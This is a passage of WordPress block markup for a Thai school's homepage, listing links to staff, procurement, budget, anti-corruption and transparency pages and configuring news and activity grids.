wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, 